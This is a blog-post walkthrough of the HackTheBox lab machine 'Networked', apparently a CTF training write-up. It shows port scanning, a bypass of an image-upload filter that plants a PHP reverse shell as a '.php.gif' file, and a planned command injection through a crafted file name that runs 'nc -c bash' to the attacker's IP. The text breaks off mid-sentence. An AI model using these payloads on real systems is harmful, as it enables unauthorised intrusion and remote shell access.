<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : gulyIP : 10.10.10.146[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- --open -T5 -n 10.10.10.146
 But this script is running soooo slow, so let&amp;rsquo;s make some changes :
 nmap -p- --open -n --min-rate 5000 10.'><title>[7] Networked Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/networked-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[7] Networked Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : gulyIP : 10.10.10.146[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- --open -T5 -n 10.10.10.146
 But this script is running soooo slow, so let&amp;rsquo;s make some changes :
 nmap -p- --open -n --min-rate 5000 10.'>
<meta property='og:url' content='https://example.com/posts/networked-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-21T00:08:21&#43;01:00'/><meta property='article:modified_time' content='2021-03-21T00:08:21&#43;01:00'/>
<meta name="twitter:title" content="[7] Networked Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Easy :waxing_gibbous_moon:Owner : gulyIP : 10.10.10.146[&#43;] PART 1 - GAIN ACCESS To get a fast scan, we&amp;rsquo;re using this command to discovery ports:
 nmap -p- --open -T5 -n 10.10.10.146
 But this script is running soooo slow, so let&amp;rsquo;s make some changes :
 nmap -p- --open -n --min-rate 5000 10.">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/networked-hackthebox/">[7] Networked Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 21, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Easy :waxing_gibbous_moon:
Owner : guly
IP : 10.10.10.146
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>To get a fast scan, we&rsquo;re using this command to discovery ports:</p>
<blockquote>
<p><code>nmap -p- --open -T5 -n 10.10.10.146</code></p>
</blockquote>
<p>But this script is running soooo slow, so let&rsquo;s make some changes :</p>
<blockquote>
<p><code>nmap -p- --open -n --min-rate 5000 10.10.10.146</code></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen that, let&rsquo;s get a deeper scan on those ports :</p>
<blockquote>
<p><code>nmap -sC -sV -sS -p22,80 10.10.10.146</code></p>
</blockquote>
<pre><code>22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
</code></pre><p>Nothing really interesting here, let&rsquo;s see the website :</p>
<p><img src="/static/HACKING/networked-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Okay&hellip; so let&rsquo;s fuzz the website and see if we can get anything interesting :</p>
<blockquote>
<p><code>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.146/FUZZ --hc=404,403 -L</code></p>
</blockquote>
<pre><code>********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.146/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                   
=====================================================================

000000001:   200        8 L      40 W       229 Ch      &quot;# directory-list-lowercase-2.3-medium.txt&quot;                                                                                                                               
000000003:   200        8 L      40 W       229 Ch      &quot;# Copyright 2007 James Fisher&quot;                                                                                                                                           
000000007:   200        8 L      40 W       229 Ch      &quot;# license, visit http://creativecommons.org/licenses/by-sa/3.0/&quot;                                                                                                         
000000009:   200        8 L      40 W       229 Ch      &quot;# Suite 300, San Francisco, California, 94105, USA.&quot;                                                                                                                     
000000012:   200        8 L      40 W       229 Ch      &quot;# on atleast 2 different hosts&quot;                                                                                                                                          
000000008:   200        8 L      40 W       229 Ch      &quot;# or send a letter to Creative Commons, 171 Second Street,&quot;                                                                                                              
000000011:   200        8 L      40 W       229 Ch      &quot;# Priority ordered case insensative list, where entries were found&quot;                                                                                                      
000000006:   200        8 L      40 W       229 Ch      &quot;# Attribution-Share Alike 3.0 License. To view a copy of this&quot;                                                                                                           
000000014:   200        8 L      40 W       229 Ch      &quot;http://10.10.10.146/&quot;                                                                                                                                                    
000000010:   200        8 L      40 W       229 Ch      &quot;#&quot;                                                                                                                                                                       
000000013:   200        8 L      40 W       229 Ch      &quot;#&quot;                                                                                                                                                                       
000000005:   200        8 L      40 W       229 Ch      &quot;# This work is licensed under the Creative Commons&quot;                                                                                                                      
000000004:   200        8 L      40 W       229 Ch      &quot;#&quot;                                                                                                                                                                       
000000002:   200        8 L      40 W       229 Ch      &quot;#&quot;                                                                                                                                                                       
000000164:   301        7 L      20 W       236 Ch      &quot;uploads&quot;                                                                                                                                                                 
000001527:   301        7 L      20 W       235 Ch      &quot;backup&quot;                                                                                                                                                                  
</code></pre><p>Oh! Backup and Uploads, that sounds interesting. Let&rsquo;s see on backup :</p>
<p><img src="/static/HACKING/networked-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Okay let&rsquo;s see what&rsquo;s inside that file :</p>
<blockquote>
<p><code>tar -xvf backup.tar</code></p>
</blockquote>
<pre><code>index.php
lib.php
photos.php
upload.php
</code></pre><p>This might be useful, I&rsquo;ll read upload.php :</p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">require</span> <span class="s1">&#39;/var/www/html/lib.php&#39;</span><span class="p">;</span>

<span class="nx">define</span><span class="p">(</span><span class="s2">&#34;UPLOAD_DIR&#34;</span><span class="p">,</span> <span class="s2">&#34;/var/www/html/uploads/&#34;</span><span class="p">);</span>

<span class="k">if</span><span class="p">(</span> <span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;submit&#39;</span><span class="p">])</span> <span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;myFile&#34;</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nv">$myFile</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;myFile&#34;</span><span class="p">];</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nx">check_file_type</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;myFile&#34;</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nx">filesize</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;myFile&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">])</span> <span class="o">&lt;</span> <span class="mi">60000</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s1">&#39;&lt;pre&gt;Invalid image file.&lt;/pre&gt;&#39;</span><span class="p">;</span>
      <span class="nx">displayform</span><span class="p">();</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">&#34;error&#34;</span><span class="p">]</span> <span class="o">!==</span> <span class="nx">UPLOAD_ERR_OK</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">&#34;&lt;p&gt;An error occurred.&lt;/p&gt;&#34;</span><span class="p">;</span>
        <span class="nx">displayform</span><span class="p">();</span>
        <span class="k">exit</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">//$name = $_SERVER[&#39;REMOTE_ADDR&#39;].&#39;-&#39;. $myFile[&#34;name&#34;];
</span><span class="c1"></span>    <span class="k">list</span> <span class="p">(</span><span class="nv">$foo</span><span class="p">,</span><span class="nv">$ext</span><span class="p">)</span> <span class="o">=</span> <span class="nx">getnameUpload</span><span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">&#34;name&#34;</span><span class="p">]);</span>
    <span class="nv">$validext</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">&#39;.jpg&#39;</span><span class="p">,</span> <span class="s1">&#39;.png&#39;</span><span class="p">,</span> <span class="s1">&#39;.gif&#39;</span><span class="p">,</span> <span class="s1">&#39;.jpeg&#39;</span><span class="p">);</span>
    <span class="nv">$valid</span> <span class="o">=</span> <span class="k">false</span><span class="p">;</span>
    <span class="k">foreach</span> <span class="p">(</span><span class="nv">$validext</span> <span class="k">as</span> <span class="nv">$vext</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">substr_compare</span><span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">&#34;name&#34;</span><span class="p">],</span> <span class="nv">$vext</span><span class="p">,</span> <span class="o">-</span><span class="nx">strlen</span><span class="p">(</span><span class="nv">$vext</span><span class="p">))</span> <span class="o">===</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$valid</span> <span class="o">=</span> <span class="k">true</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nv">$valid</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s2">&#34;&lt;p&gt;Invalid image file&lt;/p&gt;&#34;</span><span class="p">;</span>
      <span class="nx">displayform</span><span class="p">();</span>
      <span class="k">exit</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="nv">$name</span> <span class="o">=</span> <span class="nx">str_replace</span><span class="p">(</span><span class="s1">&#39;.&#39;</span><span class="p">,</span><span class="s1">&#39;_&#39;</span><span class="p">,</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;REMOTE_ADDR&#39;</span><span class="p">])</span><span class="o">.</span><span class="s1">&#39;.&#39;</span><span class="o">.</span><span class="nv">$ext</span><span class="p">;</span>

    <span class="nv">$success</span> <span class="o">=</span> <span class="nx">move_uploaded_file</span><span class="p">(</span><span class="nv">$myFile</span><span class="p">[</span><span class="s2">&#34;tmp_name&#34;</span><span class="p">],</span> <span class="nx">UPLOAD_DIR</span> <span class="o">.</span> <span class="nv">$name</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$success</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">echo</span> <span class="s2">&#34;&lt;p&gt;Unable to save file.&lt;/p&gt;&#34;</span><span class="p">;</span>
        <span class="k">exit</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">echo</span> <span class="s2">&#34;&lt;p&gt;file uploaded, refresh gallery&lt;/p&gt;&#34;</span><span class="p">;</span>

    <span class="c1">// set proper permissions on the new file
</span><span class="c1"></span>    <span class="nx">chmod</span><span class="p">(</span><span class="nx">UPLOAD_DIR</span> <span class="o">.</span> <span class="nv">$name</span><span class="p">,</span> <span class="mo">0644</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="nx">displayform</span><span class="p">();</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><p>So in &ldquo;uploads.php&rdquo; we can just upload &lsquo;.jpg&rsquo;, &lsquo;.png&rsquo;, &lsquo;.gif&rsquo;, &lsquo;.jpeg&rsquo; files, but maybe we can bypass. First of all, I&rsquo;ll get a php reverse shell, in my case I&rsquo;ll be using pentest monkey&rsquo;s : <code>https://github.com/pentestmonkey/php-reverse-shell</code></p>
<p>I&rsquo;ll be trying different ways to bypass the upload script -&gt; <code>http://10.10.10.146/upload.php</code> :</p>
<p>1- Uploading the reverse shell with .gif extension</p>
<p><img src="/static/HACKING/networked-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Maybe the script also checks for the file signature.</p>
<p>2- Uploading the reverse shell adding gif signature -&gt; GIF89a (Source : <code>https://en.wikipedia.org/wiki/List_of_file_signatures</code>)</p>
<p><img src="/static/HACKING/networked-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>But it didn&rsquo;t work neither :(</p>
<p>3- Uploading the reverse shell adding gif signature and changing the extension to &ldquo;.php.gif&rdquo;</p>
<p><img src="/static/HACKING/networked-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><img src="/static/HACKING/networked-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>OH! It worked, let&rsquo;s check -&gt; <code>http://10.10.10.146/photos.php</code> :</p>
<p><img src="/static/HACKING/networked-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>And there is out file, let&rsquo;s go to the file inside uploads directory -&gt; <code>http://10.10.10.146/uploads/10_10_14_29.php.gif</code></p>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">8989</span> ...
connect to <span class="o">[</span>10.10.14.29<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.146<span class="o">]</span> <span class="m">39932</span>
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 <span class="c1">#1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span>
 01:46:44 up <span class="m">43</span> min,  <span class="m">0</span> users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
<span class="nv">uid</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span>
sh: no job control in this shell
whoami
apache
</code></pre></div><p>Ok so we&rsquo;re in! Let&rsquo;s check home directory :</p>
<pre><code>drwxr-xr-x.  3 root root  18 Jul  2  2019 .
dr-xr-xr-x. 17 root root 224 Jul  2  2019 ..
drwxr-xr-x.  2 guly guly 159 Jul  9  2019 guly
</code></pre><p>Inside guly :</p>
<pre><code>drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -&gt; /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt
</code></pre><p>We don&rsquo;t have permissions to read the flag, but we must check &ldquo;check_attack.php&rdquo; and &ldquo;crontab.guly&rdquo; :</p>
<p><code>crontab.guly</code> :</p>
<pre><code>*/3 * * * * php /home/guly/check_attack.php
</code></pre><p>It just means that check_attack.php is a cron task which runs every 3 minutes. Let&rsquo;s see check_attack.php :</p>
<p><code>check_attack.php</code></p>
<div class="highlight"><pre class="chroma"><code class="language-php" data-lang="php"><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">require</span> <span class="s1">&#39;/var/www/html/lib.php&#39;</span><span class="p">;</span>
<span class="nv">$path</span> <span class="o">=</span> <span class="s1">&#39;/var/www/html/uploads/&#39;</span><span class="p">;</span>
<span class="nv">$logpath</span> <span class="o">=</span> <span class="s1">&#39;/tmp/attack.log&#39;</span><span class="p">;</span>
<span class="nv">$to</span> <span class="o">=</span> <span class="s1">&#39;guly&#39;</span><span class="p">;</span>
<span class="nv">$msg</span><span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
<span class="nv">$headers</span> <span class="o">=</span> <span class="s2">&#34;X-Mailer: check_attack.php</span><span class="se">\r\n</span><span class="s2">&#34;</span><span class="p">;</span>

<span class="nv">$files</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span>
<span class="nv">$files</span> <span class="o">=</span> <span class="nx">preg_grep</span><span class="p">(</span><span class="s1">&#39;/^([^.])/&#39;</span><span class="p">,</span> <span class="nx">scandir</span><span class="p">(</span><span class="nv">$path</span><span class="p">));</span>

<span class="k">foreach</span> <span class="p">(</span><span class="nv">$files</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$value</span><span class="p">)</span> <span class="p">{</span>
        <span class="nv">$msg</span><span class="o">=</span><span class="s1">&#39;&#39;</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="nv">$value</span> <span class="o">==</span> <span class="s1">&#39;index.html&#39;</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">continue</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="c1">#echo &#34;-------------\n&#34;;
</span><span class="c1"></span>
  <span class="c1">#print &#34;check: $value\n&#34;;
</span><span class="c1"></span>  <span class="k">list</span> <span class="p">(</span><span class="nv">$name</span><span class="p">,</span><span class="nv">$ext</span><span class="p">)</span> <span class="o">=</span> <span class="nx">getnameCheck</span><span class="p">(</span><span class="nv">$value</span><span class="p">);</span>
  <span class="nv">$check</span> <span class="o">=</span> <span class="nx">check_ip</span><span class="p">(</span><span class="nv">$name</span><span class="p">,</span><span class="nv">$value</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="nv">$check</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">&#34;attack!</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">;</span>
    <span class="c1"># todo: attach file
</span><span class="c1"></span>    <span class="nx">file_put_contents</span><span class="p">(</span><span class="nv">$logpath</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="nx">FILE_APPEND</span> <span class="o">|</span> <span class="nx">LOCK_EX</span><span class="p">);</span>

    <span class="nx">exec</span><span class="p">(</span><span class="s2">&#34;rm -f </span><span class="si">$logpath</span><span class="s2">&#34;</span><span class="p">);</span>
    <span class="nx">exec</span><span class="p">(</span><span class="s2">&#34;nohup /bin/rm -f </span><span class="si">$path$value</span><span class="s2"> &gt; /dev/null 2&gt;&amp;1 &amp;&#34;</span><span class="p">);</span>
    <span class="k">echo</span> <span class="s2">&#34;rm -f </span><span class="si">$path$value\n</span><span class="s2">&#34;</span><span class="p">;</span>
    <span class="nx">mail</span><span class="p">(</span><span class="nv">$to</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="nv">$msg</span><span class="p">,</span> <span class="nv">$headers</span><span class="p">,</span> <span class="s2">&#34;-F</span><span class="si">$value</span><span class="s2">&#34;</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="cp">?&gt;</span><span class="err">
</span></code></pre></div><p>This file is checking for malicious content inside ths logpath and the upload directory, so we can see that the script runs this :</p>
<pre><code>echo &quot;rm -f $path$value\n&quot;;
</code></pre><p>We can do some &ldquo;command injection&rdquo; and change this to :</p>
<pre><code>exec(&quot;rm -f anything ; nc -c bash 10.10.14.29 8888\n&quot;);
</code></pre><p>Se we&rsquo;ll do kind of command injection creating a file with the name of the other part of the command:</p>
<p><code>touch &quot;anything ; nc -c bash 10.10.14.29 8888&quot;</code></p>
<p>And if everything worked, in</p>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
